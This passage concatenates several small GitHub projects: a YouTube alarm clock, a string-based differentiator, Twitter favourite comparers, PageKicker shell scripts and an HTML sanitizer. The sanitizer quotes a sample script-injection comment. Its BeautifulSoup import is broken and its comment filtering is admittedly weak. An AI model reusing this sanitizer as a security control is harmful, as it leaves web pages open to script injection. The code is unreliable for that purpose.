json.loads(req.text)\n top_video = mydic['videoList'][0]['url'] # Maybe make this random rather than the top\n video_length = mydic['videoList'][0]['length']\n video_play_time = convert_video_duration(video_length)\n \n play_video(top_video, video_play_time)\n\n\n# Converts video duration from YouTube to seconds so we can control how long the video plays\n# Was going to use time, but this seemed simpler for what was needed\ndef convert_video_duration(video_length):\n if len(video_length) <= 2:\n return video_length\n elif len(video_length) == 4: # Stop at 9 minutes \n return (int(video_length[0]) * 60 + int(video_length[2:]))\n else:\n return 60 # Defaults to 60 seconds if duration is greater than 9:59\n\n\n# Plays video for specified amount of time\ndef play_video(url, duration):\n video_browser = results.video_browser.title()\n \n if video_browser == 'Firefox':\n browser = webdriver.Firefox()\n else: \n browser = webdriver.Chrome() #Default back to chrome in case someone enters something other than firefox or chrome\n\n browser.get(url)\n time.sleep(8) # changed this to 8 seconds to account for video start time\n # Skip ad after 5 seconds if option is available\n try:\n browser.find_element_by_class_name('videoAdUiSkipButton').click()\n except:\n pass\n time.sleep(duration)\n browser.quit()\n\n\nalarm = process_time_from_user(results.wake_time.replace(\":\", \"\").replace(\" \", \"\")) # Clean up input so it is easier to work with\nvideo_type = results.video_type.lower()\n\nif \"JOHN\" in video_type:\n print(\"DELETE THIS. THIS IS PRACTICE.\")\n\nwhile True:\n current_time = time.strftime(\"%H%M\")\n if alarm != current_time:\n #print(current_time)\n sys.stdout.write(\"\\rIt is now \" + current_time + \". Your alarm is set to go off at \" + alarm) # http://stackoverflow.com/a/5291323/4393950\n time.sleep(15) # Only sleep for 15 seconds in the event that your pc goes to sleep at any time during the day\n elif alarm == current_time:\n sys.stdout.write(\"\\rIt is now \" + current_time + \". Alarm is going off now!!! \") # http://stackoverflow.com/a/5291323/4393950\n\t\t\n # In the event that one fails, try the other\n if video_type == \"top\":\n try: \n play_top_video()\n except:\n play_local_video()\n elif video_type != \"top\":\n try:\n play_local_video()\n except:\n play_top_video()\n time.sleep(60)" } ]
1
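process_time_from_user above tries a 12-hour strptime format first and falls back to 24-hour. The same idea in isolation, so the fallback is easy to test without the alarm loop:

```python
# Minimal sketch: normalize '7:00PM' / '700PM' / '19:00' / '1900' to 'HHMM'.
import time

def to_hhmm(raw):
    cleaned = raw.replace(":", "").replace(" ", "")
    for fmt in ("%I%M%p", "%H%M"):          # 12-hour first, then 24-hour
        try:
            return time.strftime("%H%M", time.strptime(cleaned, fmt))
        except ValueError:
            continue
    raise ValueError(f"unrecognized time: {raw!r}")

for sample in ("7:00 PM", "700AM", "19:00", "1900"):
    print(sample, "->", to_hhmm(sample))
```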
benlvn/Differentiatie
https://github.com/benlvn/Differentiatie
dbca7b282c8b4ebcd0b26454e3f44b953018879a
57becccce062ef550dce366ef192c8116a00d3f7
25493853fc45b22297a21c1568d5cdc5879c9688
refs/heads/master
2015-09-26T11:45:47.717191
2015-09-23T03:23:08
2015-09-23T03:23:08
42,975,935
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6562384963035583, "alphanum_fraction": 0.6705925464630127, "avg_line_length": 31.74698829650879, "blob_id": "47e698c50247d650cb184a856bd895f709b42b24", "content_id": "8f71034b273183da02712ac3b9799f223b6c7a7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 95, "num_lines": 83, "path": "/differentiate.py", "repo_name": "benlvn/Differentiatie", "src_encoding": "UTF-8", "text": "def negative2tilde(expression,direction):\n\tresult = ''\n\tif direction == 'f' or direction == 'forward':\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '-' and (ind == 0 or expression[ind-1] in '(^*-+='):\n\t\t\t\tresult += '~'\n\t\t\telse:\n\t\t\t\tresult += char\n\tif direction == 'r' or direction == 'reverse' or direction == 'b' or direction == 'backward':\n\t\tfor char in expression:\n\t\t\tif char == '~':\n\t\t\t\tresult += '-'\n\t\t\telse:\n\t\t\t\tresult += char\n\treturn result\n\ndef differentiate(expression,respect_to):\n\tif '=' in expression:\n\t\t#Create a list of indicies where the equals signs are\n\t\tequals_positions = [0]\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '=':\n\t\t\t\tequals_positions += [ind,ind+1]\n\t\tequals_positions += [len(expression)]\n\t\t\n\t\t#Create a list of expressions between the equals signs\n\t\texpressions = []\n\t\tfor i in range(0,len(equals_positions),2):\n\t\t\texpressions += [expression[equals_positions[i]:equals_positions[i+1]]]\n\t\t\n\t\t#Attach differentiated expressions in a string\n\t\tanswer = ''\n\t\tfor exp in expressions:\n\t\t\tanswer += differentiate(exp,respect_to)+'='\n\t\tanswer = answer[:len(answer)-1]\n\t\treturn negative2tilde(answer,'r')\n\t\t\t\n\tif '+' in expression or '-' in expression:\n\t\t#Change negative signs to ~ for simplicity\n\t\texpression = negative2tilde(expression,'f')\n\t\t#Create a list of indicies where the operations are (+ or -)\n\t\toperation_positions = [0]\n\t\t#Create a list of terms before the plus or minus\n\t\tplus_positions = [0]\n\t\tminus_positions = [0]\n\t\toperation_count = 0\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '+':\n\t\t\t\toperation_positions += [ind,ind+1]\n\t\t\t\toperation_count += 1\n\t\t\t\tplus_positions += [operation_count]\n\t\t\telif char == '-':\n\t\t\t\toperation_positions += [ind,ind+1]\n\t\t\t\toperation_count += 1\n\t\t\t\tminus_positions += [operation_count]\n\t\toperation_positions += [len(expression)]\n\t \n\t\t#Create a list of expressions between the operations\n\t\texpressions = []\n\t\tfor i in range(0,len(operation_positions),2):\n\t\t\texpressions += [expression[operation_positions[i]:operation_positions[i+1]]]\n\t \n\t\t#Attach differentiated expressions in a string\n\t\tanswer = ''\n\t\tfor ind, exp in enumerate(expressions):\n\t\t\tanswer += differentiate(exp,respect_to)\n\t\t\tif ind+1 in plus_positions:\n\t\t\t\tanswer += '+'\n\t\t\telif ind+1 in minus_positions:\n\t\t\t\tanswer += '-'\n\t\t#Change ~ back to -\n\t\treturn negative2tilde(answer,'r')\n\t\t\t\n\t\t\t\n\t#Differentiating a expression with respect to itself gives you 1\n\t#Differentiating a constant gives you 0\n\t#Differentiating a expression with respect anything else gives you d(expression)/d(respect_to)\n\tif expression == respect_to:\n\t\treturn '1'\n\telif set(expression) <= set('1234567890.'):\n\t\treturn '0'\n\telse:\n\t\treturn 'd(%s)/d(%s)' % (expression,respect_to)" } ]
1
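A quick usage check of differentiate, assuming the file above is saved as differentiate.py on the import path; the expected outputs follow from the sum/difference rule and the base cases in the code.

```python
# Minimal sketch: exercise the sum/difference rule implemented above.
from differentiate import differentiate

print(differentiate("x+3", "x"))      # -> 1+0
print(differentiate("x+3-y", "x"))    # -> 1+0-d(y)/d(x)
print(differentiate("y=x+5", "x"))    # -> d(y)/d(x)=1+0
```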
BasmatiBlanco/TwitterCompare
https://github.com/BasmatiBlanco/TwitterCompare
5857ce76f0f71ebd3cdb2b85c63d0cfb31c4fe55
a515614cdb03d42143513d39994ddc631af6924a
729959d96eae79f4d8d42d96160e6f6a4a732b37
refs/heads/master
2022-12-17T10:03:12.897793
2020-09-08T19:28:56
2020-09-08T19:28:56
292,330,453
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5577078461647034, "alphanum_fraction": 0.5738498568534851, "avg_line_length": 26.18181800842285, "blob_id": "bc77c979f7643cd75b2c0c3d6900981e5154ab38", "content_id": "d6dc2801cda8163ccbcd5243cbbc500226fda35b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 94, "num_lines": 88, "path": "/Twitter-Comp-GUI.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import tkinter as tk\r\nimport matplotlib.pyplot as plt\r\nimport tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\nx = []\r\ny = []\r\nx2 = []\r\ny2 = []\r\ntweet_fav1 = 0\r\ntweet_fav2 = 0\r\ndef compare_tweets_graph(screen_name, graph_order):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n if graph_order == 1: \r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y.append(tweet.favorite_count)\r\n x.append(tweet.created_at)\r\n elif graph_order == 2:\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y2.append(tweet.favorite_count)\r\n x2.append(tweet.created_at)\r\ndef graph_tweets(user1, user2):\r\n compare_tweets_graph(user1, 1)\r\n compare_tweets_graph(user2, 2)\r\n plt.plot(x, y, label = user1)\r\n plt.plot(x2, y2, label = user2) \r\n plt.xlabel(\"Time\") \r\n plt.ylabel('Faves') \r\n plt.title(\"Faves over Time \") \r\n plt.legend()\r\n plt.show()\r\n\r\nroot = tk.Tk()\r\n\r\ngreeting = tk.Label (\r\n text = \"Compare Users\", \r\n foreground = \"black\",\r\n )\r\nfirst_user = tk.Label (\r\n text = \"First\", \r\n foreground = \"black\",\r\n )\r\nsecond_user = tk.Label (\r\n text = \"Second\", \r\n foreground = \"black\",\r\n )\r\nentry_first = tk.Entry(fg = \"black\", bg = \"AntiqueWhite1\", width = 50)\r\nentry_second = tk.Entry(fg = \"black\", bg = \"AntiqueWhite1\", width = 50)\r\n\r\nbutton = tk.Button(\r\n text=\"Submit\",\r\n width=25,\r\n height=1,\r\n bg=\"black\",\r\n fg=\"white\",\r\n command = lambda: get_in_graph()\r\n )\r\n\r\ndef get_in_graph():\r\n first_in = entry_first.get()\r\n second_in = entry_second.get()\r\n graph_tweets(first_in, second_in)\r\n\r\ngreeting.pack()\r\nfirst_user.pack()\r\nentry_first.pack()\r\nsecond_user.pack()\r\nentry_second.pack()\r\nbutton.pack()\r\nroot.mainloop()" }, { "alpha_fraction": 0.5764367580413818, "alphanum_fraction": 0.5956896543502808, "avg_line_length": 35.84782791137695, "blob_id": "bdeefa096ff1b86c94f2eafb3f9bb38a5952dc69", "content_id": "b6dbbcbb09002f68e6e8db1c53d9efcc6bbc871a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3480, "license_type": "no_license", "max_line_length": 153, "num_lines": 92, "path": "/graph.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\r\nimport tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n\r\nauth = 
tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\nx = []\r\ny = []\r\nx2 = []\r\ny2 = []\r\ntweet_fav1 = 0\r\ntweet_fav2 = 0\r\n\r\nprint (\"Choose your first user to compare\")\r\nfirst = input()\r\nprint (\"Choose your second user to compare\")\r\nsecond = input()\r\nprint(\"Do you want to see a graph? (Y/N)\")\r\ngraph_choice = input()\r\nif graph_choice != 'Y' and graph_choice != 'y' and graph_choice != 'N' and graph_choice != 'n':\r\n    graph_choice = input(\"Please enter Y or N\")\r\n\r\n\r\ndef compare_tweets_graph(screen_name, graph_order):\r\n    recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n    tweet_list = []\r\n    tweet_list.extend(recent_tweets)\r\n\r\n    marker = tweet_list[-1].id-1\r\n    while len(recent_tweets) > 0:\r\n        recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n        tweet_list.extend(recent_tweets)\r\n        marker = tweet_list[-1].id-1 \r\n    if graph_order == 1: \r\n        for tweet in tweet_list:\r\n            if tweet.text.startswith(\"RT\"):\r\n                tweet_list.remove(tweet)\r\n            else:\r\n                y.append(tweet.favorite_count)\r\n                x.append(tweet.created_at)\r\n    elif graph_order == 2:\r\n        for tweet in tweet_list:\r\n            if tweet.text.startswith(\"RT\"):\r\n                tweet_list.remove(tweet)\r\n            else:\r\n                y2.append(tweet.favorite_count)\r\n                x2.append(tweet.created_at)\r\n    \r\ndef graph_tweets(user1, user2):\r\n    compare_tweets_graph(user1, 1)\r\n    compare_tweets_graph(user2, 2)\r\n    plt.plot(x, y, label = user1)\r\n    plt.plot(x2, y2, label = user2) \r\n    plt.xlabel(\"Time\") \r\n    plt.ylabel('Faves') \r\n    plt.title(\"Faves over Time \") \r\n    plt.legend()\r\n    plt.show()\r\n\r\ndef recent_tweet_list(screen_name):\r\n    recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n    tweet_list = []\r\n    tweet_list.extend(recent_tweets)\r\n    marker = tweet_list[-1].id-1\r\n    while len(recent_tweets) > 0:\r\n        recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n        tweet_list.extend(recent_tweets)\r\n        marker = tweet_list[-1].id-1 \r\n    tweet_fav = 0\r\n    for tweet in tweet_list:\r\n        if tweet.text.startswith(\"RT\"):\r\n            tweet_list.remove(tweet)\r\n        else:\r\n            tweet_fav += tweet.favorite_count\r\n    return tweet_fav\r\n\r\ndef compare_tweet_favs(user1, user2):\r\n    total_user1= recent_tweet_list(user1)\r\n    total_user2= recent_tweet_list(user2)\r\n    if total_user1 > total_user2:\r\n        print( str(user1) + \" is the winner with \" + str(total_user1) + \" favorites compared to \" + str(user2) + \"'s \" + str(total_user2) + \" favorites\")\r\n    elif total_user1 < total_user2:\r\n        print( str(user2) + \" is the winner with \" + str(total_user2) + \" favorites compared to \" + str(user1) + \"'s \" + str(total_user1) + \" favorites\")\r\n    elif total_user1 == total_user2:\r\n        print(\"It's a tie! 
both \" + str(user1) + \" and \" + str(user2) + \" have the same amount of favorites\")\r\n\r\nif graph_choice == 'y' or graph_choice == 'Y':\r\n graph_tweets(first, second)\r\nelif graph_choice == 'n' or graph_choice == 'N': \r\n compare_tweet_favs(first, second)" }, { "alpha_fraction": 0.6160714030265808, "alphanum_fraction": 0.6363095045089722, "avg_line_length": 36.181819915771484, "blob_id": "b95308066cdef06c9ff87f31dd29cf820364b0be", "content_id": "a78c6eace27663c5722e3445e545086b0868ddcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "no_license", "max_line_length": 153, "num_lines": 44, "path": "/twittercomparison.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n \r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\n\r\ndef recent_tweet_list(screen_name):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n tweet_fav = 0\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n tweet_fav += tweet.favorite_count\r\n return tweet_fav\r\n\r\n\r\ndef compare_tweet_favs(user1, user2):\r\n total_user1= recent_tweet_list(user1)\r\n total_user2= recent_tweet_list(user2)\r\n if total_user1 > total_user2:\r\n print( str(user1) + \" is the winner with \" + str(total_user1) + \" favorites compared to \" + str(user2) + \"'s \" + str(total_user2) + \" favorites\")\r\n elif total_user1 < total_user2:\r\n print( str(user2) + \" is the winner with \" + str(total_user2) + \" favorites compared to \" + str(user1) + \"'s \" + str(total_user1) + \" favorites\")\r\n elif total_user1 == total_user2:\r\n print(\"It's a tie! both \" + str(user1) + \" and \" + str(user2) + \" have the same amount of favorites\")\r\n\r\n\r\nprint (\"Choose your first user to compare\")\r\nfirst = input()\r\nprint (\"Choose your second under to compare\")\r\nsecond = input()\r\n\r\ncompare_tweet_favs(first, second)\r\n" }, { "alpha_fraction": 0.761904776096344, "alphanum_fraction": 0.761904776096344, "avg_line_length": 57.85714340209961, "blob_id": "a5c46831dec7a00d81756bd8e5ef947abd1750b3", "content_id": "9260593b0ba2827c49f197f923a07ed9689a6c55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 420, "license_type": "no_license", "max_line_length": 119, "num_lines": 7, "path": "/readme.txt", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "There are two versions of this project. \r\n\r\ngraph.py will give you the option to compare the tweets as either an aggregate of likes or as a graph.\r\ntwittercomparison.py will just compare two peoples tweets as aggregate. They are separate because graph.py is a mess. \r\nTwitter-Comp-GUI will use a GUI to make a simple graph, no option for it to just be text on command line. \r\n\r\nNext up, trying to make it run faster. \r\n" } ]
4
fredzannarbor/pagekicker-community
https://github.com/fredzannarbor/pagekicker-community
8f582b3a43f650294563a44d53037211727b901c
02c3d39556dd37836a5933188a7b2798d3eada36
1623e8fa7c525d5a3eb924a71824f22acf0235cc
refs/heads/master
2021-07-10T07:53:43.815864
2021-04-22T07:10:40
2021-04-22T07:10:40
55,376,461
21
8
null
2016-04-04T00:38:12
2017-02-12T05:57:39
2017-02-15T02:23:34
HTML
[ { "alpha_fraction": 0.6969883441925049, "alphanum_fraction": 0.7000614404678345, "avg_line_length": 48.24242401123047, "blob_id": "fa3e05892a55342751f31782424e8b0f20c679d0", "content_id": "10f05ea6183bf6bd03feaa987c5ac7ff16bcc706", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1627, "license_type": "permissive", "max_line_length": 310, "num_lines": 33, "path": "/scripts/includes/front_matter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " # build title page\n\n\techo \"# \"$customtitle > tmp/$uuid/titlepage.md\n\techo \"# \"$byline >> tmp/$uuid/titlepage.md\n echo \"# Enhanced with Text Analytics by PageKicker Robot\" $jobprofilename >> tmp/$uuid/titlepage.md\n\techo '![pk logo](assets/PageKicker_cmyk300dpi.png)\\' >> tmp/$uuid/titlepage.md\n\techo '\\pagenumbering{roman}' >> tmp/$uuid/titlepage.md\n\n pandoc tmp/$uuid/titlepage.md -o tmp/$uuid/titlepage.pdf --variable fontsize=12pt --latex-engine=xelatex\n\n # build \"About the Robot Author\"\n\n echo \"# About the Robot Author\" > tmp/$uuid/robot_author.md\n echo \"# $lastname\" >> tmp/$uuid/robot_author.md\n cat \"$authorbio\" >> tmp/$uuid/robot_author.md\n\n # build \"also by this Robot Author\"\n \n # build \"Acknowledgements\"\n\n cp assets/acknowledgements.md tmp/$uuid/acknowledgements.md\n\techo \" \" >> tmp/$uuid/acknowledgements.md\n\techo \" \" >> tmp/$uuid/acknowledgements.md\n\techo '![author-sig](../conf/jobprofiles/signatures/'\"$sigfile\"')' >> tmp/$uuid/acknowledgements.md\n\n # assemble front matter\n\n\tcat tmp/$uuid/titlepage.md assets/newpage.md assets/copyright_page.md assets/newpage.md tmp/$uuid/robot_author.md assets/newpage.md tmp/$uuid/acknowledgements.md assets/newpage.md tmp/$uuid/summary.md assets/newpage.md tmp/$uuid/rr.md assets/newpage.md tmp/$uuid/sorted_uniqs.md > tmp/$uuid/textfrontmatter.md\n\tpandoc tmp/$uuid/textfrontmatter.md --latex-engine=xelatex -o tmp/$uuid/textfrontmatter.pdf\n\n # add wordcloud page to front matter\n\n\tpdftk tmp/$uuid/textfrontmatter.pdf tmp/$uuid/wordcloud.pdf output tmp/$uuid/$uuid\"_frontmatter.pdf\"\n" }, { "alpha_fraction": 0.6701570749282837, "alphanum_fraction": 0.6701570749282837, "avg_line_length": 53.57143020629883, "blob_id": "834564c1c6113f62d3b86de9249d2f2e793864ba", "content_id": "2647406e2fef168805841759951f61df2da0de09", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 382, "license_type": "permissive", "max_line_length": 83, "num_lines": 7, "path": "/scripts/includes/listofpages.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo '\\pagenumbering{gobble}' > \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\necho \"# List of Chapters\" >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\ncat \"$TMPDIR$uuid/seeds/filtered.pagehits\" | sed G >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30.5, "blob_id": "2acbff2450b78cc5f2be5568589c77f71390178d", "content_id": "e8971c5944bdafb176bff4740494ca08325c94cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "permissive", "max_line_length": 50, "num_lines": 2, 
"path": "/test/1001_7.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../test/1001_7.csv 7\n" }, { "alpha_fraction": 0.563697874546051, "alphanum_fraction": 0.5678316354751587, "avg_line_length": 39.318180084228516, "blob_id": "fb62ac1915c3f38fc75c34539e80516cb853e67f", "content_id": "c7a816b3bd62ed625f15087bcf46411e9f0af31b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2661, "license_type": "permissive", "max_line_length": 100, "num_lines": 66, "path": "/scripts/bin/sanitize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "from beautifulsoup4 import beautifulsoup4\nimport re\n\ndef sanitize(html):\n # allow these tags. Other tags are removed, but their child elements remain\n whitelist = ['em', 'i', 'strong', 'u', 'a', 'b', 'p', 'br', 'code', 'pre', 'table', 'tr', 'td' ]\n\n # allow only these attributes on these tags. No other tags are allowed any\n # attributes.\n attr_whitelist = { 'a':['href','title','hreflang']}\n\n # remove these tags, complete with contents.\n blacklist = [ 'script', 'style' ]\n\n attributes_with_urls = [ 'href', 'src' ]\n\n # BeautifulSoup is catching out-of-order and unclosed tags, so markup\n # can't leak out of comments and break the rest of the page.\n soup = BeautifulSoup(html)\n\n # now strip HTML we don't like.\n for tag in soup.findAll():\n if tag.name.lower() in blacklist:\n # blacklisted tags are removed in their entirety\n tag.extract()\n elif tag.name.lower() in whitelist:\n # tag is allowed. Make sure all the attributes are allowed.\n for attr in tag.attrs:\n # allowed attributes are whitelisted per-tag\n if tag.name.lower() in attr_whitelist and \\\n attr[0].lower() in attr_whitelist[ tag.name.lower() ]:\n # some attributes contain urls..\n if attr[0].lower() in attributes_with_urls:\n # ..make sure they're nice urls\n if not re.match(r'(https?|ftp)://', attr[1].lower()):\n tag.attrs.remove( attr )\n # ok, then\n pass\n else:\n # not a whitelisted attribute. Remove it.\n del tag[attr]\n else:\n # not a whitelisted tag. I'd like to remove it from the tree\n # and replace it with its children. But that's hard. It's much\n # easier to just replace it with an empty span tag.\n tag.name = \"span\"\n tag.attrs = []\n\n # stringify back again\n safe_html = str(soup)\n\n # HTML comments can contain executable scripts, depending on the browser,\n # so we'll\n # be paranoid and just get rid of all of them\n # e.g. 
<!--[if lt IE 7]><script type=\"text/javascript\">h4x0r();</script><!\n    # [endif]-->\n    # TODO - I rather suspect that this is the weakest part of the operation..\n    safe_html = re.sub(r'(?s)<!--.*?-->', '', safe_html)\n    return safe_html\n\nif __name__ == \"__main__\":\n\timport sys\n\tinput_file = open(sys.argv[1])\n\toutput_file = open(sys.argv[2], \"wb\")\n\toutput_file.write(sanitize(input_file.read()).encode(\"utf8\"))\t\n\toutput_file.close()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6754385828971863, "avg_line_length": 21.700000762939453, "blob_id": "c89a2b9381e7e0d448314d6cda7cb7a31cabed13", "content_id": "fc7b6a4cae902a90090949752db73638313f49cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 228, "license_type": "permissive", "max_line_length": 142, "num_lines": 10, "path": "/scripts/rr_loop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrm -f out.txt\nfor file in *\ndo\necho -n \"$file,\" >> out.txt\n/opt/bitnami/java/bin/java -jar /opt/bitnami/apache2/htdocs/pk-new/development/scripts/lib/CmdFlesh.jar $file | sed -n '/Flesh-/p' >> out.txt\ndone\n\nexit 0\n\n" }, { "alpha_fraction": 0.6912644505500793, "alphanum_fraction": 0.6972476840019226, "avg_line_length": 35.81428527832031, "blob_id": "7c3e484bbb35070d297e69ed3ee031a65489ca44", "content_id": "267ad420124d43bc5e9efb7fb48212e6e5323e33", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2507, "license_type": "permissive", "max_line_length": 246, "num_lines": 70, "path": "/scripts/daily-wp-post.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\r\n\r\nif shopt -q login_shell ; then\r\n\r\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\r\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\r\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\r\n\t\techo \"exiting\"\r\n\t\texit 1\r\n\telse\r\n\t\t. \"$HOME\"/.pagekicker/config.txt\r\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\r\n\tfi\r\nelse\r\n\t. \"$HOME\"/.pagekicker/config.txt #hard-coding /home is a hack\r\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\r\nfi\r\n\r\ncd $scriptpath\r\n\r\n. 
includes/set-variables.sh\r\n\r\n\r\nmy_twitter_handle=\"fredzannarbor\"\r\nname=\"Samuel Johnson\"\r\npostauthorid=\"2\"\r\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\r\n\r\necho \"creating daily wordpress post\"\r\necho \"$TMPDIR$uuid\"\r\n\r\nmkdir -m 775 -p \"$TMPDIR$uuid/wordpress\"\r\n\r\n\r\n$FORTUNE_BIN johnson >> \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\"\r\ncat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\"\r\nwotd_name=$(cat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" | head -n 1 | cut -d\" \" -f1)\r\nif [ \"$wotd_name\" = \"To\" ] ;\r\n  then\r\n\t\twotd_name=$(cat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" | head -n 1 | cut -d\" \" -f2)\r\n\telse\r\n\t\ttrue\r\nfi\r\n# echo \"$wotd_name\"\r\n# echo \"$wotd_name\" > \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\necho \"## My Word of the Day\" >> \"$TMPDIR$uuid/wordpress/wotd_h2.txt\"\r\n\r\ncat \"$TMPDIR$uuid/wordpress/wotd_h2.txt\" \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\n\r\necho -e \"\\n\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\n\r\necho \"## Recent references to $wotd_name on Twitter\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\nt search all \"$wotd_name lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n#t search all \"$wotd_name lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/twitter_wotd.txt\"\r\n\r\necho -e \"\\n\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\n\r\necho \"## Recent references to $name on Twitter\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\nt search all \"Samuel Johnson lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n#t search all \"Samuel Johnson lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/twsjtest.md\"\r\n\r\npandoc -f markdown -t html -o \"$TMPDIR$uuid/wordpress/johnson_wotd.html\" \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\r\n\r\n\"$WP_BIN\" post create \"$TMPDIR$uuid/wordpress/johnson_wotd.html\" --post_type=post --post_status=\"publish\" --post_title=\"Daily Dose of Samuel Johnson: $wotd_name & more\" --post_mime_type=html --post_category=\"words-language\" --post_author=\"$postauthorid\"\r\n" }, { "alpha_fraction": 0.7049180269241333, "alphanum_fraction": 0.727556586265564, "avg_line_length": 60, "blob_id": "e64889e65dd8babc3ccfb786350496161e75d6de", "content_id": "4becc163a188f5853260d3b5e65b772d8eae90fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 262, "num_lines": 21, "path": "/scripts/includes/Tiphys-keyword-search.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": 